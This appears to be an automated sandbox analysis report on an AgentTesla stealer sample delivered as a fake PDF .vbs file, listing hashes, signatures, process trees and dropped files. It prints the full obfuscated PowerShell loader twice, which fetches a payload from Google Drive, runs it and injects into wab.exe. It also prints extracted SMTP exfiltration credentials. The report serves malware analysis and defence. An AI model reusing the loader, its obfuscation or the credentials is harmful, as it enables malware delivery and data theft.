agenttesla | 8b7c5d53812ea0abfc73d680313417506ce8cdf6476604829f74e1c62775dac4

General

Target

CANKO DMC IMPORT ENQUIRY.PDF.vbs
Size

37KB
MD5

f502e10ed6fe68f3ae7ab8dc21d85905
SHA1

c5f150a8ad65c02818b317202bc0b4c885d681a6
SHA256

8b7c5d53812ea0abfc73d680313417506ce8cdf6476604829f74e1c62775dac4
SHA512

e676b0c0974339cebbe6f4e0ce4e0a33aefde01588af7cc20c7ae6be11b8467da271a7496c8e37245ff7c523dbabbf3de3d9831318127b9dbc98987d84a4930e
SSDEEP

768:u0agBVh4WAZGc8NnKwiQRP1Ugmj8VeuwRwHv8:hwqNnKwJDLVmRP

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.z2neumec.com
Port:
587
Username:
[email protected]
Password:
Gid@2021

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.z2neumec.com
Port:
587
Username:
[email protected]
Password:
Gid@2021
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

10 drive.google.com
2 drive.google.com
3 drive.google.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 api.ipify.org
15 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1908 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2636 powershell.exe
1908 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2636 set thread context of 1908 2636 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2188 powershell.exe
2636 powershell.exe
2636 powershell.exe
1908 wab.exe
1908 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2636 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2188 powershell.exe
Token: SeDebugPrivilege 2636 powershell.exe
Token: SeDebugPrivilege 1908 wab.exe

flow	ioc
10	drive.google.com
2	drive.google.com
3	drive.google.com

flow	ioc
14	api.ipify.org
15	api.ipify.org

pid	process
1908	wab.exe

pid	process
2636	powershell.exe
1908	wab.exe

description	pid	process	target process
PID 2636 set thread context of 1908	2636	powershell.exe	wab.exe

pid	process
2188	powershell.exe
2636	powershell.exe
2636	powershell.exe
1908	wab.exe
1908	wab.exe

pid	process
2636	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	1908	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2516 wrote to memory of 2188	2516	WScript.exe	powershell.exe
PID 2516 wrote to memory of 2188	2516	WScript.exe	powershell.exe
PID 2516 wrote to memory of 2188	2516	WScript.exe	powershell.exe
PID 2188 wrote to memory of 2580	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2580	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2580	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2636	2188	powershell.exe	powershell.exe
PID 2188 wrote to memory of 2636	2188	powershell.exe	powershell.exe
PID 2188 wrote to memory of 2636	2188	powershell.exe	powershell.exe
PID 2188 wrote to memory of 2636	2188	powershell.exe	powershell.exe
PID 2636 wrote to memory of 2572	2636	powershell.exe	cmd.exe
PID 2636 wrote to memory of 2572	2636	powershell.exe	cmd.exe
PID 2636 wrote to memory of 2572	2636	powershell.exe	cmd.exe
PID 2636 wrote to memory of 2572	2636	powershell.exe	cmd.exe
PID 2636 wrote to memory of 1908	2636	powershell.exe	wab.exe
PID 2636 wrote to memory of 1908	2636	powershell.exe	wab.exe
PID 2636 wrote to memory of 1908	2636	powershell.exe	wab.exe
PID 2636 wrote to memory of 1908	2636	powershell.exe	wab.exe
PID 2636 wrote to memory of 1908	2636	powershell.exe	wab.exe
PID 2636 wrote to memory of 1908	2636	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CANKO DMC IMPORT ENQUIRY.PDF.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Varslinger Restordres Maidly Levendegre Mandarining Goatherds Phobophobia #>;$tilbageholdelse=(cmd /c set /A 115^^0);Function Uncommiserating ([String]$Lobolos){$Milano41=[char][int]$tilbageholdelse+'ubstring';$Uddeliges=8;$Snorebroderier=Raadsvampen($Lobolos);For($Stttevokalerne=7; $Stttevokalerne -lt $Snorebroderier; $Stttevokalerne+=$Uddeliges){$Enterogenous=$Lobolos.$Milano41.Invoke($Stttevokalerne, 1);$Agapetid=$Agapetid+$Enterogenous;}$Agapetid;}function Taintless208 ($Sarcogenic){& ($Nedgange) ($Sarcogenic);}function Raadsvampen ([String]$Illdisposedness){$Nervus=$Illdisposedness.Length-1;$Nervus;}$Paperful=Uncommiserating 'TjeneriTStramajrSaarenda cr,nionnedsle sUtil.adfLutes eePraisefrilluminrAccompainaturaln Svabr,gTiecl,s ';$Gullyhole=Uncommiserating 'Re.amplhDaglejetCouthestLu,kingpF verwosagerste:Ninthse/.rydens/omlastedmulctatr Kobberi IdetagvDissidee Wholel. DiversgP.ammenoIm,lemeoFradraggGennemflRecr.oneTrac.in.RegerincHjertesotempyohmLibrney/Volatilu,ndistrcRrhnerh?TilsnegeFel.togxAnnishvpTv ngsaoBalancerNarkotitKraftv.=Underexd Pro.oko Cynophw W negrncryogenl.octiluo Kurbasa Laryn.dAlmsmen& Misknoi ,elegrd Forure=Matlock1TelescoYBasisco4SkrmindI lancclYLividne2Staahejy vi ualWCiceron4Cudbrnd0 fi.dleebul,las5decempldSrgetog6stuntmaNUnmummiKSydafriTKlumreduSoldiseHOverpolxperiproqL,rrainoSugge tqRengri,yGl,veunP Ort opGU managpQuagg.sTk.ratosFKa.ikatrAfdryppA F,ankeMprunellI Jequir ';$Nedgange=Uncommiserating 'KlemhagiHelliggeJanitr,xEnhedsv ';$Funktionsdygtige=Uncommiserating ' Sho.ji$Gl ssargUntrimml happenoRombepobQuamsubaCappi,rlBambus.:Untre,dSSamfundkFremhveavandpaam rierfolBefolkneAns.arsncarpetb2Le itat8Decel.r ret.rde= freyj emimoSStrafratSlotsafaSydafrirFornyertTallinj-KitosflBTrem.stiSplotchtKulackfsOstindiTBestormrTilgodeaForciblnHyssingsFabriksfAxo etreFranzisr Sw nge ufologi- CidernSFortegno,ephalouDiscontrUgt,skecBiop,ageMa,jong Bygsukk$Thixo rGA,ndigeuWind urlA.reveslfrysep,yFlanke.h ArchduoIdentitl MorgeneU,signi Brndehu-PugendeDHjemvi e ForkrosBrkr.gntFi regniShakyamnFalkeneaJun iertLitter,i sykopaoHindbrbnGoblini Tin.oid$SidelinAObelialf StaklalringbryaVicomteg BesttetIndeh.veMa.sakr ';Taintless208 (Uncommiserating 'barnes,$Ex ressg BalanclCowpe,boFolkemabD,llemeaAfb,ndelRupit c:GynecolAInspherf nthrallbraendeaMoronesg Overgat Ci,ylieSellcle= Gradat$.latykueNynorsknReumativNdtrf e:Defamatacletchspasmindep Espresd A,cyonaRedismitBaetyluagrsenke ') ;Taintless208 (Uncommiserating 'SensomrIForstanmTra sispGulmohaoMilvagor DescantUpsweep-MandoraM ForfrioSyrupp.dSymmorpuDecertalPrecioueOutstun OsasfisBGoutsafiN urogetPiratudsStet.seT orantorDumbbela RegistnSpicigesVrdighefEndo.ite Triumfr Bran h ') ;$Aflagte=$Aflagte+'\Bernoullian.Tam' ;Taintless208 (Uncommiserating 'Skorste$ScrofulgjeblikslEgestiooBejledebSelvmedaAmperenlExplo t:PrediviNAerodynuByttestlPartiediExacerbnTrafiket IconomePaiockerseksaa,vSurrealaCobbledlResund,losculabeCine atrF.rbjersOa.land=Acetoni(Ud.ivenTFac,nereGeophilsContract Unique- FloretPFamletgaAntip.rt Mldtcah Fungal Urokses$EdsformAingeldafR glowslKronpriaU.mystigFehaarstSmaatoseStonker)Affilia ') ;while (-not $Nulintervallers) {Taintless208 (Uncommiserating 'GalgebaITvrdrivfBa.dune whisker(.utineo$CyanensSdaf iesk Persona.enshermLakkesflfiredobeBrandmunMilieuv2Syda,er8Diammon.Kunds aJ HellenohemiopibStberneSOgdenmutAlm.eskaEftersptT,ansiteG,mnasi Fang,no-VelkomseEdulcorqNonreta R,with$AstrogeP Form eaTi hngep Ceremoe tolkerr PulverfIndvikluVoldelilTappema)Filsema Eftermo{KairoliSAntireltBowlereaTvedelirAsbkbrutPrinter-Galeo.eS SolleglT,mpereePardry ePreconspSpectre S,lvest1 Jalous}Betaline Vvenecl Deco.ts DogmateSvi.ese{GretesuSComm ndt,dedessa EmirerrHorsefitinf,cti-Aghach.SSpurveflOfficereYmtrekae GenesipAmicab, lissofl1 Ganoid;R.sinweT Si.keraCordilli,ocialinUnd.tritSkabertl Diffeoe SmeltesFolklorsBesmykk2Inte,re0For,kni8Whipsta Betoner$to,vtidFSikkerhu gunkyfnReolpl kBl frditJinxes iconductoAnsk.elnBordskas H,rquedVedko,my U.applgstrdem.tPon.icuiInnoxiogMari imeRelands}proboul ');Taintless208 (Uncommiserating 'r.erhis$RealistgStngteslIlleradoKontra bP.tternaTes,atrlAri,met:HinkestNBrilliauOverw.elTri,sviiInvestonkolonnetBlank ve befordrStrugglv Snowbla Virk,klInbreatl kamgareRibbensrPierrotsMu,tist=Barneal(N.dfrysTKrushaaeActinoms Toonsat Opgang-TegnstnPAlbatioa Pycnomt UdstdnhKinooc, Gyrites$ AllottAnikotinf GangsmlUndert a tomuheg F,itsttBlyro.eeRedeals)Acutanc ') ;}Taintless208 (Uncommiserating 'uns,mpa$Indretng g.bberlFerskenohuffingbSema,tiaAutohyplVulgari:AfgudstNStrrelso Tylvtenfjletcusreasseme SndagsnRach.fosMultimaoPhenethrOvermatyKopifun Saunder=Sygeple FrasalgGA mersceD,isatotW arish-EksponeCRelateroPosningn So.schtNoviluneH,postanGrnnegatClavuvi Licite.$ S dagsAOptatiof GrssellNonsalea provengNonp.lst Jury,eeFiskesn ');Taintless208 (Uncommiserating 'Visio,e$stejlhegkinlesslflowedvo UdsaetbAfsendeaSva,erslHydroc.:FejdedeTHemadroy ilbagerR adyrkoSpytkrll Fre,haemi isterMuscovahInowerfa AtmolytBrusetat BiscuieUltraspnLoernekeLatte,ls Vinqui Superfu= Feedba t,ykfar[.ilstrbSothelloy HorntasInitialtdiolef.evrdibremKlema,i.Flu,plaCSaml vsodrudespn Arb jdvNedskrieExplicarB.nresjtBoswell] Nonthe:Su,cina:d.scernF eddahurSofficeo olkeflmKarnevaBStrafc apermitnsDiscontePeris a6N,zamba4ReceptiSBotchedtTvangs.rFootl niQuarreln ColombgP nctua(Bagakse$AbmhoslNSelvretoLampropnSkalrttsPosttraeSanitasnKamenessWeigelao Augustr.arveprySmaatin)Unw,ede ');Taintless208 (Uncommiserating 'Leastge$ UnnuzzgDags eflUnactivobronto,b DuplikaMistouclJorramu:NormaliT sam,leeext.rmikUngoversCoronett SendtssRebeho,tTosser.uPjaskenmAfproevp Cary.te RgrertrBlissennAce.ylie,abicuvsPeridid Normal=Betuske S,abber[ bea,naSDivaricySjlevansConfirmtFastlaneWatertimgrun,er.RepositTSlogesje FamilixTaarnurtUnrheto.Wirily.EK.nstgdnTaktregcJose.hiosemi,isd AttritiEns ndenTrummelgNonnour]Aftersh:Ekspos :GrnskolARef,rtiSSpolia CSpagettIClientlIBoerens.AbirritGKodernee gonistamoraf.STrissentDopingsrBarlowfiu.litign FingergFor.rak(Goldfis$RuddieeT BearsmyInviterrtouris oS,otsmal Forskne SkolderCoen,tyhdiasramaLicitert.gandantstemmele MensurnflyverseMoonlitsAfkorte)N,nstor ');Taintless208 (Uncommiserating 'Valgned$ PartitgAfpresslMorphi,oPa.ruljbAlk licaSolar,elPelargo:avocatiR ArtfuluSydamerb EuryaliSedimenn panskeTarkaninSouthers Presse=R.nnash$SkriverTRe,letieudsmuglkN.vendisScalepatMutedlysBeatleatMellemauF,metagmMiddelhpLogicbueFljmndmrLydolffnBelem ee hogaprsRigdomm.UndetessBimpleruUnitterbUb.skaasXylogratTheodosrSudaneriTrffelsnCom,onegblandin( studi,3Bowlerh2Misaddr1Breb ge2 Borts 4Leucoto9Todimen,Nonsecr3 Isoler0Moneysb9 H stol5Antilet1Fodbold)Vagabon ');Taintless208 $Rubinens;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:2580

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Varslinger Restordres Maidly Levendegre Mandarining Goatherds Phobophobia #>;$tilbageholdelse=(cmd /c set /A 115^^0);Function Uncommiserating ([String]$Lobolos){$Milano41=[char][int]$tilbageholdelse+'ubstring';$Uddeliges=8;$Snorebroderier=Raadsvampen($Lobolos);For($Stttevokalerne=7; $Stttevokalerne -lt $Snorebroderier; $Stttevokalerne+=$Uddeliges){$Enterogenous=$Lobolos.$Milano41.Invoke($Stttevokalerne, 1);$Agapetid=$Agapetid+$Enterogenous;}$Agapetid;}function Taintless208 ($Sarcogenic){& ($Nedgange) ($Sarcogenic);}function Raadsvampen ([String]$Illdisposedness){$Nervus=$Illdisposedness.Length-1;$Nervus;}$Paperful=Uncommiserating 'TjeneriTStramajrSaarenda cr,nionnedsle sUtil.adfLutes eePraisefrilluminrAccompainaturaln Svabr,gTiecl,s ';$Gullyhole=Uncommiserating 'Re.amplhDaglejetCouthestLu,kingpF verwosagerste:Ninthse/.rydens/omlastedmulctatr Kobberi IdetagvDissidee Wholel. DiversgP.ammenoIm,lemeoFradraggGennemflRecr.oneTrac.in.RegerincHjertesotempyohmLibrney/Volatilu,ndistrcRrhnerh?TilsnegeFel.togxAnnishvpTv ngsaoBalancerNarkotitKraftv.=Underexd Pro.oko Cynophw W negrncryogenl.octiluo Kurbasa Laryn.dAlmsmen& Misknoi ,elegrd Forure=Matlock1TelescoYBasisco4SkrmindI lancclYLividne2Staahejy vi ualWCiceron4Cudbrnd0 fi.dleebul,las5decempldSrgetog6stuntmaNUnmummiKSydafriTKlumreduSoldiseHOverpolxperiproqL,rrainoSugge tqRengri,yGl,veunP Ort opGU managpQuagg.sTk.ratosFKa.ikatrAfdryppA F,ankeMprunellI Jequir ';$Nedgange=Uncommiserating 'KlemhagiHelliggeJanitr,xEnhedsv ';$Funktionsdygtige=Uncommiserating ' Sho.ji$Gl ssargUntrimml happenoRombepobQuamsubaCappi,rlBambus.:Untre,dSSamfundkFremhveavandpaam rierfolBefolkneAns.arsncarpetb2Le itat8Decel.r ret.rde= freyj emimoSStrafratSlotsafaSydafrirFornyertTallinj-KitosflBTrem.stiSplotchtKulackfsOstindiTBestormrTilgodeaForciblnHyssingsFabriksfAxo etreFranzisr Sw nge ufologi- CidernSFortegno,ephalouDiscontrUgt,skecBiop,ageMa,jong Bygsukk$Thixo rGA,ndigeuWind urlA.reveslfrysep,yFlanke.h ArchduoIdentitl MorgeneU,signi Brndehu-PugendeDHjemvi e ForkrosBrkr.gntFi regniShakyamnFalkeneaJun iertLitter,i sykopaoHindbrbnGoblini Tin.oid$SidelinAObelialf StaklalringbryaVicomteg BesttetIndeh.veMa.sakr ';Taintless208 (Uncommiserating 'barnes,$Ex ressg BalanclCowpe,boFolkemabD,llemeaAfb,ndelRupit c:GynecolAInspherf nthrallbraendeaMoronesg Overgat Ci,ylieSellcle= Gradat$.latykueNynorsknReumativNdtrf e:Defamatacletchspasmindep Espresd A,cyonaRedismitBaetyluagrsenke ') ;Taintless208 (Uncommiserating 'SensomrIForstanmTra sispGulmohaoMilvagor DescantUpsweep-MandoraM ForfrioSyrupp.dSymmorpuDecertalPrecioueOutstun OsasfisBGoutsafiN urogetPiratudsStet.seT orantorDumbbela RegistnSpicigesVrdighefEndo.ite Triumfr Bran h ') ;$Aflagte=$Aflagte+'\Bernoullian.Tam' ;Taintless208 (Uncommiserating 'Skorste$ScrofulgjeblikslEgestiooBejledebSelvmedaAmperenlExplo t:PrediviNAerodynuByttestlPartiediExacerbnTrafiket IconomePaiockerseksaa,vSurrealaCobbledlResund,losculabeCine atrF.rbjersOa.land=Acetoni(Ud.ivenTFac,nereGeophilsContract Unique- FloretPFamletgaAntip.rt Mldtcah Fungal Urokses$EdsformAingeldafR glowslKronpriaU.mystigFehaarstSmaatoseStonker)Affilia ') ;while (-not $Nulintervallers) {Taintless208 (Uncommiserating 'GalgebaITvrdrivfBa.dune whisker(.utineo$CyanensSdaf iesk Persona.enshermLakkesflfiredobeBrandmunMilieuv2Syda,er8Diammon.Kunds aJ HellenohemiopibStberneSOgdenmutAlm.eskaEftersptT,ansiteG,mnasi Fang,no-VelkomseEdulcorqNonreta R,with$AstrogeP Form eaTi hngep Ceremoe tolkerr PulverfIndvikluVoldelilTappema)Filsema Eftermo{KairoliSAntireltBowlereaTvedelirAsbkbrutPrinter-Galeo.eS SolleglT,mpereePardry ePreconspSpectre S,lvest1 Jalous}Betaline Vvenecl Deco.ts DogmateSvi.ese{GretesuSComm ndt,dedessa EmirerrHorsefitinf,cti-Aghach.SSpurveflOfficereYmtrekae GenesipAmicab, lissofl1 Ganoid;R.sinweT Si.keraCordilli,ocialinUnd.tritSkabertl Diffeoe SmeltesFolklorsBesmykk2Inte,re0For,kni8Whipsta Betoner$to,vtidFSikkerhu gunkyfnReolpl kBl frditJinxes iconductoAnsk.elnBordskas H,rquedVedko,my U.applgstrdem.tPon.icuiInnoxiogMari imeRelands}proboul ');Taintless208 (Uncommiserating 'r.erhis$RealistgStngteslIlleradoKontra bP.tternaTes,atrlAri,met:HinkestNBrilliauOverw.elTri,sviiInvestonkolonnetBlank ve befordrStrugglv Snowbla Virk,klInbreatl kamgareRibbensrPierrotsMu,tist=Barneal(N.dfrysTKrushaaeActinoms Toonsat Opgang-TegnstnPAlbatioa Pycnomt UdstdnhKinooc, Gyrites$ AllottAnikotinf GangsmlUndert a tomuheg F,itsttBlyro.eeRedeals)Acutanc ') ;}Taintless208 (Uncommiserating 'uns,mpa$Indretng g.bberlFerskenohuffingbSema,tiaAutohyplVulgari:AfgudstNStrrelso Tylvtenfjletcusreasseme SndagsnRach.fosMultimaoPhenethrOvermatyKopifun Saunder=Sygeple FrasalgGA mersceD,isatotW arish-EksponeCRelateroPosningn So.schtNoviluneH,postanGrnnegatClavuvi Licite.$ S dagsAOptatiof GrssellNonsalea provengNonp.lst Jury,eeFiskesn ');Taintless208 (Uncommiserating 'Visio,e$stejlhegkinlesslflowedvo UdsaetbAfsendeaSva,erslHydroc.:FejdedeTHemadroy ilbagerR adyrkoSpytkrll Fre,haemi isterMuscovahInowerfa AtmolytBrusetat BiscuieUltraspnLoernekeLatte,ls Vinqui Superfu= Feedba t,ykfar[.ilstrbSothelloy HorntasInitialtdiolef.evrdibremKlema,i.Flu,plaCSaml vsodrudespn Arb jdvNedskrieExplicarB.nresjtBoswell] Nonthe:Su,cina:d.scernF eddahurSofficeo olkeflmKarnevaBStrafc apermitnsDiscontePeris a6N,zamba4ReceptiSBotchedtTvangs.rFootl niQuarreln ColombgP nctua(Bagakse$AbmhoslNSelvretoLampropnSkalrttsPosttraeSanitasnKamenessWeigelao Augustr.arveprySmaatin)Unw,ede ');Taintless208 (Uncommiserating 'Leastge$ UnnuzzgDags eflUnactivobronto,b DuplikaMistouclJorramu:NormaliT sam,leeext.rmikUngoversCoronett SendtssRebeho,tTosser.uPjaskenmAfproevp Cary.te RgrertrBlissennAce.ylie,abicuvsPeridid Normal=Betuske S,abber[ bea,naSDivaricySjlevansConfirmtFastlaneWatertimgrun,er.RepositTSlogesje FamilixTaarnurtUnrheto.Wirily.EK.nstgdnTaktregcJose.hiosemi,isd AttritiEns ndenTrummelgNonnour]Aftersh:Ekspos :GrnskolARef,rtiSSpolia CSpagettIClientlIBoerens.AbirritGKodernee gonistamoraf.STrissentDopingsrBarlowfiu.litign FingergFor.rak(Goldfis$RuddieeT BearsmyInviterrtouris oS,otsmal Forskne SkolderCoen,tyhdiasramaLicitert.gandantstemmele MensurnflyverseMoonlitsAfkorte)N,nstor ');Taintless208 (Uncommiserating 'Valgned$ PartitgAfpresslMorphi,oPa.ruljbAlk licaSolar,elPelargo:avocatiR ArtfuluSydamerb EuryaliSedimenn panskeTarkaninSouthers Presse=R.nnash$SkriverTRe,letieudsmuglkN.vendisScalepatMutedlysBeatleatMellemauF,metagmMiddelhpLogicbueFljmndmrLydolffnBelem ee hogaprsRigdomm.UndetessBimpleruUnitterbUb.skaasXylogratTheodosrSudaneriTrffelsnCom,onegblandin( studi,3Bowlerh2Misaddr1Breb ge2 Borts 4Leucoto9Todimen,Nonsecr3 Isoler0Moneysb9 H stol5Antilet1Fodbold)Vagabon ');Taintless208 $Rubinens;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:2572

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
fb3e193a54d20b1fca3e547e15f70753

SHA1
77237980dc14b7779dda63a3ca79a803c969e466

SHA256
9e8ed37f24dcb306991ca54bbdfa19592deab333ea5c06195281cfc777d9a40c

SHA512
140b055b68e28f447a1c701d55a6bdb0ef4bf217f0e6bd1edfafd5edb6602ffaae1baba36333fd65da6f75c102ebdc167263e77cb3daacea19f4ad8554068bac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab1E88.tmp
Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4203.tmp
Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar440B.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IA9BQ20G891MLPGRCJ21.temp
Filesize
7KB

MD5
802c6a1dc463bf533c260aa9793c4185

SHA1
58d3f3538578ca992f9978cb558f8d5b2ddb7d05

SHA256
b5d4454f6f898f9895d36f4d426363d755a291c0e08dfc3b36b1855ac17d5fbe

SHA512
20f8a49ddf1d3be8c47d696fd2aa5686d0fb0f75c918f1e456f192ee604feea577fbc9cbb96c29c0b56ed541a23693466c2ee9afe67a01aa5cf36aa71e1d2fad

Download Submit
memory/1908-70-0x0000000001020000-0x0000000001062000-memory.dmp

Filesize
264KB

Download
memory/1908-47-0x0000000077400000-0x00000000774D6000-memory.dmp

Filesize
856KB

Download
memory/1908-69-0x0000000077400000-0x00000000774D6000-memory.dmp

Filesize
856KB

Download
memory/1908-68-0x0000000001020000-0x0000000002082000-memory.dmp

Filesize
16.4MB

Download
memory/1908-115-0x0000000024050000-0x0000000024090000-memory.dmp

Filesize
256KB

Download
memory/1908-72-0x000000006EC70000-0x000000006F35E000-memory.dmp

Filesize
6.9MB

Download
memory/1908-114-0x000000006EC70000-0x000000006F35E000-memory.dmp

Filesize
6.9MB

Download
memory/1908-45-0x0000000077210000-0x00000000773B9000-memory.dmp

Filesize
1.7MB

Download
memory/1908-74-0x0000000024050000-0x0000000024090000-memory.dmp

Filesize
256KB

Download
memory/1908-46-0x0000000077436000-0x0000000077437000-memory.dmp

Filesize
4KB

Download
memory/2188-11-0x0000000002950000-0x0000000002972000-memory.dmp

Filesize
136KB

Download
memory/2188-31-0x00000000024F0000-0x0000000002570000-memory.dmp

Filesize
512KB

Download
memory/2188-32-0x00000000024F0000-0x0000000002570000-memory.dmp

Filesize
512KB

Download
memory/2188-30-0x00000000024F0000-0x0000000002570000-memory.dmp

Filesize
512KB

Download
memory/2188-29-0x00000000024F0000-0x0000000002570000-memory.dmp

Filesize
512KB

Download
memory/2188-28-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

Filesize
9.6MB

Download
memory/2188-71-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

Filesize
9.6MB

Download
memory/2188-4-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

Filesize
2.9MB

Download
memory/2188-12-0x0000000002760000-0x0000000002772000-memory.dmp

Filesize
72KB

Download
memory/2188-10-0x00000000024F0000-0x0000000002570000-memory.dmp

Filesize
512KB

Download
memory/2188-9-0x00000000024F0000-0x0000000002570000-memory.dmp

Filesize
512KB

Download
memory/2188-8-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

Filesize
9.6MB

Download
memory/2188-7-0x00000000024F0000-0x0000000002570000-memory.dmp

Filesize
512KB

Download
memory/2188-6-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

Filesize
9.6MB

Download
memory/2188-5-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download
memory/2636-16-0x0000000002750000-0x0000000002790000-memory.dmp

Filesize
256KB

Download
memory/2636-44-0x0000000077400000-0x00000000774D6000-memory.dmp

Filesize
856KB

Download
memory/2636-43-0x0000000005F20000-0x0000000006020000-memory.dmp

Filesize
1024KB

Download
memory/2636-42-0x0000000077210000-0x00000000773B9000-memory.dmp

Filesize
1.7MB

Download
memory/2636-39-0x0000000073250000-0x00000000737FB000-memory.dmp

Filesize
5.7MB

Download
memory/2636-38-0x0000000002750000-0x0000000002790000-memory.dmp

Filesize
256KB

Download
memory/2636-37-0x00000000063B0000-0x000000000AA3F000-memory.dmp

Filesize
70.6MB

Download
memory/2636-36-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/2636-35-0x0000000073250000-0x00000000737FB000-memory.dmp

Filesize
5.7MB

Download
memory/2636-34-0x0000000005F20000-0x0000000006020000-memory.dmp

Filesize
1024KB

Download
memory/2636-33-0x0000000002750000-0x0000000002790000-memory.dmp

Filesize
256KB

Download
memory/2636-18-0x0000000002750000-0x0000000002790000-memory.dmp

Filesize
256KB

Download
memory/2636-17-0x0000000073250000-0x00000000737FB000-memory.dmp

Filesize
5.7MB

Download
memory/2636-15-0x0000000073250000-0x00000000737FB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads